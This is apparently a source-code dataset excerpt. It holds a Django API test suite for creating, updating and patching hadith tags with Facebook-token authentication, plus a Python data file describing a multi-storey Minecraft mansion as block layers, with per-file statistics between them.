HTTP_204_NO_CONTENT
from hadiths.tests.setup import TestCaseBase
class HadithTagGetApiTestCase(TestCaseBase):
def test__get_json__200(self):
resp = self.get_hadithtag()
self.assertEqual(HTTP_200_OK, resp.status_code)
def test__get_form__200(self):
resp = self.get_hadithtag(HTTP_ACCEPT='text/html')
self.assertEqual(HTTP_200_OK, resp.status_code)
class HadithTagPostApiTestCase(TestCaseBase):
def test__no_auth_token__403(self):
resp = self.post('/apis/hadithtags', {'name': 'test'})
self.assertEqual(HTTP_403_FORBIDDEN, resp.status_code)
self.assertEqual(HTTP_403_FORBIDDEN, resp.data['status_code'])
self.assertEqual("Couldn't authenticate user.", resp.data['error'])
def test__invalid_auth_token__403(self):
resp = self.post('/apis/hadithtags?fb_token=%s' % TestCaseBase.invalid_accesstoken, {'name': 'test'})
self.assertEqual(HTTP_403_FORBIDDEN, resp.status_code)
self.assertEqual(HTTP_403_FORBIDDEN, resp.data['status_code'])
self.assertEqual("Invalid Facebook access token.", resp.data['error'])
def test__valid_auth_token__no_user_permission__401(self):
resp = self.post('/apis/hadithtags?fb_token=%s' % TestCaseBase.jack_accesstoken, {'name': 'test'})
self.assertEqual(HTTP_403_FORBIDDEN, resp.status_code)
self.assertEqual(HTTP_403_FORBIDDEN, resp.data['status_code'])
self.assertEqual("User doesn't have permission for this action.", resp.data['error'])
def test__valid_auth_token__user_permission__no_name__400(self):
resp = self.post('/apis/hadithtags?fb_token=%s' % TestCaseBase.marie_accesstoken, {})
self.assertEqual(HTTP_400_BAD_REQUEST, resp.status_code)
self.assertEqual(HTTP_400_BAD_REQUEST, resp.data['status_code'])
self.assertEqual("Invalid input.", resp.data['error'])
self.assertTrue('name' in resp.data['detail'])
self.assertEqual(['This field is required.'], resp.data['detail']['name'])
def test__valid_auth_token__user_permission__blank_name__400(self):
resp = self.post('/apis/hadithtags?fb_token=%s' % TestCaseBase.marie_accesstoken, {'name': ' '})
self.assertEqual(HTTP_400_BAD_REQUEST, resp.status_code)
self.assertEqual(HTTP_400_BAD_REQUEST, resp.data['status_code'])
self.assertEqual("Invalid input.", resp.data['error'])
self.assertTrue('name' in resp.data['detail'])
self.assertEqual(['This field may not be blank.'], resp.data['detail']['name'])
def test__valid_auth_token__user_permission__valid_name__tag_added(self):
resp = self.post('/apis/hadithtags?fb_token=%s' % TestCaseBase.marie_accesstoken, {'name': 'test'})
self.assertEqual(HTTP_201_CREATED, resp.status_code)
tag = resp.data
self.assertEqual('test', tag['name'])
resp2 = self.get('/apis/hadithtags/%d' % tag['id'])
self.assertEqual(HTTP_200_OK, resp2.status_code)
tag2 = resp2.data
self.assertEqual(tag, tag2)
class HadithTagPutApiTestCase(TestCaseBase):
tag = None
tag_id = None
@classmethod
def setUpClass(cls):
TestCaseBase.setUpClass()
c = Client()
resp = c.post('/apis/hadithtags?fb_token=%s' % TestCaseBase.marie_accesstoken, {'name': 'test'})
assert resp.status_code == HTTP_201_CREATED
cls.tag = resp.data
cls.tag_id = cls.tag['id']
@classmethod
def tearDownClass(cls):
c = Client()
resp = c.delete('/apis/hadithtags/%d?fb_token=%s' %
(HadithTagPutApiTestCase.tag_id, TestCaseBase.marie_accesstoken), {'title': 'test'})
assert resp.status_code == HTTP_204_NO_CONTENT
TestCaseBase.tearDownClass()
def test__no_auth_token__403(self):
resp = self.put('/apis/hadithtags/%d' % HadithTagPutApiTestCase.tag_id, {'name': 'test'})
self.assertEqual(HTTP_403_FORBIDDEN, resp.status_code)
self.assertEqual(HTTP_403_FORBIDDEN, resp.data['status_code'])
self.assertEqual("Couldn't authenticate user.", resp.data['error'])
def test__invalid_auth_token__403(self):
resp = self.put(
'/apis/hadithtags/%d?fb_token=%s' % (HadithTagPutApiTestCase.tag_id, TestCaseBase.invalid_accesstoken),
{'name': 'test'})
self.assertEqual(HTTP_403_FORBIDDEN, resp.status_code)
self.assertEqual(HTTP_403_FORBIDDEN, resp.data['status_code'])
self.assertEqual("Invalid Facebook access token.", resp.data['error'])
def test__valid_auth_token__no_user_permission__401(self):
resp = self.put('/apis/hadithtags/%d?fb_token=%s' % (HadithTagPutApiTestCase.tag_id, TestCaseBase.jack_accesstoken),
{'name': 'test'})
self.assertEqual(HTTP_403_FORBIDDEN, resp.status_code)
self.assertEqual(HTTP_403_FORBIDDEN, resp.data['status_code'])
self.assertEqual("User doesn't have permission for this action.", resp.data['error'])
def test__valid_auth_token__user_permission__no_name__400(self):
resp = self.put(
'/apis/hadithtags/%d?fb_token=%s' % (HadithTagPutApiTestCase.tag_id, TestCaseBase.marie_accesstoken), {})
self.assertEqual(HTTP_400_BAD_REQUEST, resp.status_code)
self.assertEqual(HTTP_400_BAD_REQUEST, resp.data['status_code'])
self.assertEqual("Invalid input.", resp.data['error'])
self.assertTrue('name' in resp.data['detail'])
self.assertEqual(['This field is required.'], resp.data['detail']['name'])
def test__valid_auth_token__user_permission__blank_name__400(self):
resp = self.put(
'/apis/hadithtags/%d?fb_token=%s' % (HadithTagPutApiTestCase.tag_id, TestCaseBase.marie_accesstoken),
{'name': ' '})
self.assertEqual(HTTP_400_BAD_REQUEST, resp.status_code)
self.assertEqual(HTTP_400_BAD_REQUEST, resp.data['status_code'])
self.assertEqual("Invalid input.", resp.data['error'])
self.assertTrue('name' in resp.data['detail'])
self.assertEqual(['This field may not be blank.'], resp.data['detail']['name'])
def test__valid_auth_token__user_permission__valid_new_name__tag_updated(self):
resp = self.put(
'/apis/hadithtags/%d?fb_token=%s' % (HadithTagPutApiTestCase.tag_id, TestCaseBase.marie_accesstoken),
{'name': 'test_updated'})
self.assertEqual(HTTP_200_OK, resp.status_code)
tag = resp.data
self.assertEqual('test_updated', tag['name'])
resp2 = self.get('/apis/hadithtags/%d' % tag['id'])
self.assertEqual(HTTP_200_OK, resp2.status_code)
tag2 = resp2.data
self.assertEqual(tag, tag2)
class HadithTagPatchApiTestCase(TestCaseBase):
tag = None
tag_id = None
@classmethod
def setUpClass(cls):
TestCaseBase.setUpClass()
c = Client()
resp = c.post('/apis/hadithtags?fb_token=%s' % TestCaseBase.marie_accesstoken, {'name': 'test'})
assert resp.status_code == HTTP_201_CREATED
cls.tag = resp.data
cls.tag_id = cls.tag['id']
@classmethod
def tearDownClass(cls):
c = Client()
resp = c.delete('/apis/hadithtags/%d?fb_token=%s' %
(HadithTagPatchApiTestCase.tag_id, TestCaseBase.marie_accesstoken), {'name': 'test'})
assert resp.status_code == HTTP_204_NO_CONTENT
TestCaseBase.tearDownClass()
def test__patch__no_auth_token__403(self):
resp = self.patch('/apis/hadithtags/%d' % HadithTagPatchApiTestCase.tag_id, {'name': 'test'})
self.assertEqual(HTTP_403_FORBIDDEN, resp.status_code)
self.assertEqual(HTTP_403_FORBIDDEN, resp.data['status_code'])
self.assertEqual("Couldn't authenticate user.", resp.data['error'])
def test__patch__invalid_auth_token__403(self):
resp = self.patch('/apis/hadithtags/%d?fb_token=%s' %
(HadithTagPatchApiTestCase.tag_id, TestCaseBase.invalid_accesstoken), {'name': 'test'})
self.assertEqual(HTTP_403_FORBIDDEN, resp.status_code)
self.assertEqual(HTTP_403_FORBIDDEN, resp.data['status_code'])
self.assertEqual("Invalid Facebook access token.", resp.data['error'])
def test__patch__valid_auth_token__no_user_permission__401(self):
resp = self.patch('/apis/hadithtags/%d?fb_token=%s' %
(HadithTagPatchApiTestCase.tag_id, TestCaseBase.jack_accesstoken), {'name': 'test'})
self.assertEqual(HTTP_403_FORBIDDEN, resp.status_code)
self.assertEqual(HTTP_403_FORBIDDEN, resp.data['status_code'])
self.assertEqual("User doesn't have permission for this action.", resp.data['error'])
def test__patch__valid_auth_token__user_permission__no_title__200(self):
resp = self.patch('/apis/hadithtags/%d?fb_token=%s' %
(HadithTagPatchApiTestCase.tag_id, TestCaseBase.marie_accesstoken), {})
self.assertEqual(HTTP_200_OK, resp.status_code)
def test__patch__valid_auth_token__user_permission__blank_title__400(self):
resp = self.patch('/apis/hadithtags/%d?fb_token=%s' %
(HadithTagPatchApiTestCase.tag_id, TestCaseBase.marie_accesstoken), {'name': ' '})
self.assertEqual(HTTP_400_BAD_REQUEST, resp.status_code)
self.assertEqual(HTTP_400_BAD_REQUEST, resp.data['status_code'])
self.assertEqual("Invalid input.", resp.data['error'])
self.assertTrue('name' in resp.data['detail'])
self.assertEqual(['This field may not be blank.'], resp.data['detail']['name'])
def test__patch__valid_auth_token__user_permission__valid_title__person_updated(self):
resp = self.patch('/apis/hadithtags/%d?fb_token=%s' %
(HadithTagPatchApiTestCase.tag_id, TestCaseBase.marie_accesstoken), {'name': 'test_updated'})
self.assertEqual(HTTP_200_OK, resp.status_code)
person = resp.data
self.assertEqual('test_updated', person['name'])
resp2 = self.get('/apis/hadithtags/%d' % person['id'])
self.assertEqual(HTTP_200_OK, resp2.status_code)
person2 = resp2.data
self.assertEqual(person, person2)
| 47.461165
| 120
| 0.727012
| 1,269
| 9,777
| 5.277384
| 0.080378
| 0.138868
| 0.104972
| 0.104524
| 0.921308
| 0.921308
| 0.901747
| 0.895774
| 0.878154
| 0.849485
| 0
| 0.024162
| 0.136443
| 9,777
| 205
| 121
| 47.692683
| 0.769039
| 0
| 0
| 0.719298
| 0
| 0
| 0.176741
| 0.058096
| 0
| 0
| 0
| 0
| 0.415205
| 1
| 0.140351
| false
| 0
| 0.017544
| 0
| 0.204678
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d51236b81664ed3979f4d6dcbfe5a73b9b5b075a
| 12,002
|
py
|
Python
|
stock-filters/Buildings/mansion.py
|
Chris-Drury/caMelGDMC
|
b7498fedb57837b18bbf172e3f34bc285559e3dd
|
[
"0BSD"
] | null | null | null |
stock-filters/Buildings/mansion.py
|
Chris-Drury/caMelGDMC
|
b7498fedb57837b18bbf172e3f34bc285559e3dd
|
[
"0BSD"
] | null | null | null |
stock-filters/Buildings/mansion.py
|
Chris-Drury/caMelGDMC
|
b7498fedb57837b18bbf172e3f34bc285559e3dd
|
[
"0BSD"
] | null | null | null |
from Buildings.material import AIR, DIRT, BRICKS, LOG, STAIRS_STONE, BED, DOOR, GLASS, TORCH, PLANK, WOOD
mansion = {
"height": -1,
"building": [
[
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, DIRT, DIRT, DIRT, DIRT, DIRT, DIRT, DIRT, DIRT, DIRT, AIR],
[AIR, AIR, DIRT, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"],
DIRT, AIR],
[AIR, AIR, DIRT, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"],
DIRT, AIR],
[AIR, AIR, DIRT, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"],
DIRT, AIR],
[AIR, AIR, DIRT, DIRT, DIRT, DIRT, BRICKS["STONE"], DIRT, DIRT, DIRT, DIRT, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
],
[
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, LOG, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], LOG, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"],
LOG, AIR],
[AIR, AIR, BRICKS["STONE"], AIR, AIR, BRICKS["STONE"], BRICKS["STONE"], STAIRS_STONE["N"], AIR, AIR, BRICKS["STONE"],
AIR],
[AIR, AIR, BRICKS["STONE"], BED["W_HEAD_TAKEN"], AIR, AIR, AIR, AIR, AIR, AIR, BRICKS["STONE"], AIR],
[AIR, AIR, BRICKS["STONE"], BED["W_FOOT"], AIR, AIR, AIR, AIR, BED["S_FOOT"], BED["S_HEAD"], BRICKS["STONE"],
AIR],
[AIR, AIR, LOG, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], DOOR["S_LOWER"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"],
LOG, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
],
[
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, LOG, BRICKS["STONE"], GLASS, BRICKS["STONE"], LOG, BRICKS["STONE"], GLASS, BRICKS["STONE"], LOG,
AIR],
[AIR, AIR, BRICKS["STONE"], AIR, AIR, BRICKS["STONE"], STAIRS_STONE["N"], AIR, AIR, AIR, BRICKS["STONE"],
AIR],
[AIR, AIR, GLASS, AIR, AIR, AIR, AIR, AIR, AIR, AIR, GLASS, AIR],
[AIR, AIR, BRICKS["STONE"], AIR, AIR, AIR, AIR, AIR, AIR, AIR, BRICKS["STONE"], AIR],
[AIR, AIR, LOG, BRICKS["STONE"], GLASS, BRICKS["STONE"], DOOR["LEFT_UPPER"], BRICKS["STONE"], GLASS, BRICKS["STONE"],
LOG, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
],
[
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, LOG, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], LOG, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"],
LOG, AIR],
[AIR, AIR, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], STAIRS_STONE["N"], AIR, AIR, AIR, AIR, BRICKS["STONE"],
AIR],
[AIR, AIR, BRICKS["STONE"], TORCH["S"], AIR, AIR, AIR, AIR, AIR, TORCH["N"], BRICKS["STONE"], AIR],
[AIR, AIR, BRICKS["STONE"], AIR, AIR, AIR, AIR, AIR, AIR, AIR, BRICKS["STONE"], AIR],
[AIR, AIR, LOG, BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"], BRICKS["STONE"],
LOG, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
],
[
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, LOG, LOG, LOG, LOG, LOG, LOG, LOG, LOG, LOG, AIR],
[AIR, AIR, LOG, BRICKS["STONE"], STAIRS_STONE["N"], AIR, AIR, AIR, PLANK, PLANK, WOOD["ACACIA"], AIR],
[AIR, AIR, LOG, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, WOOD["ACACIA"], AIR],
[AIR, AIR, LOG, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, WOOD["ACACIA"], AIR],
[AIR, AIR, LOG, WOOD["STRIPPED_OAK"], WOOD["STRIPPED_OAK"], WOOD["STRIPPED_OAK"], LOG, WOOD["STRIPPED_OAK"], WOOD["STRIPPED_OAK"], WOOD["STRIPPED_OAK"],
LOG, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
],
[
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, LOG, PLANK, PLANK, PLANK, LOG, PLANK, PLANK, PLANK, LOG, AIR],
[AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
[AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
[AIR, AIR, PLANK, BED["N_HEAD"], BED["N_FOOT"], AIR, AIR, AIR, BED["S_FOOT"], BED["S_HEAD"], PLANK, AIR],
[AIR, AIR, LOG, PLANK, PLANK, PLANK, LOG, PLANK, PLANK, PLANK, LOG, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
],
[
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, LOG, PLANK, GLASS, PLANK, LOG, PLANK, GLASS, PLANK, LOG, AIR],
[AIR, AIR, PLANK, AIR, AIR, AIR, TORCH["E"], AIR, AIR, AIR, PLANK, AIR],
[AIR, AIR, GLASS, AIR, AIR, AIR, AIR, AIR, AIR, AIR, GLASS, AIR],
[AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
[AIR, AIR, LOG, PLANK, GLASS, PLANK, LOG, PLANK, GLASS, PLANK, LOG, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
],
[
[AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
[AIR, AIR, LOG, PLANK, PLANK, PLANK, LOG, PLANK, PLANK, PLANK, LOG, AIR],
[AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
[AIR, AIR, PLANK, TORCH["S"], AIR, AIR, AIR, AIR, AIR, TORCH["N"], PLANK, AIR],
[AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
[AIR, AIR, LOG, PLANK, PLANK, PLANK, LOG, PLANK, PLANK, PLANK, LOG, AIR],
[AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
],
[
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
[AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
[AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
[AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
[AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
],
[
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
[AIR, AIR, PLANK, AIR, AIR, AIR, AIR, AIR, AIR, AIR, PLANK, AIR],
[AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
],
[
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK, PLANK],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
[AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR, AIR],
]
]
}
def generate_mansions():
return [mansion]
| 65.584699
| 164
| 0.506249
| 1,735
| 12,002
| 3.488761
| 0.021326
| 1.158764
| 1.622171
| 2.026103
| 0.965967
| 0.965967
| 0.963985
| 0.954733
| 0.934908
| 0.895424
| 0
| 0.000119
| 0.2997
| 12,002
| 182
| 165
| 65.945055
| 0.720048
| 0
| 0
| 0.784091
| 0
| 0
| 0.047409
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005682
| false
| 0
| 0.005682
| 0.005682
| 0.017045
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.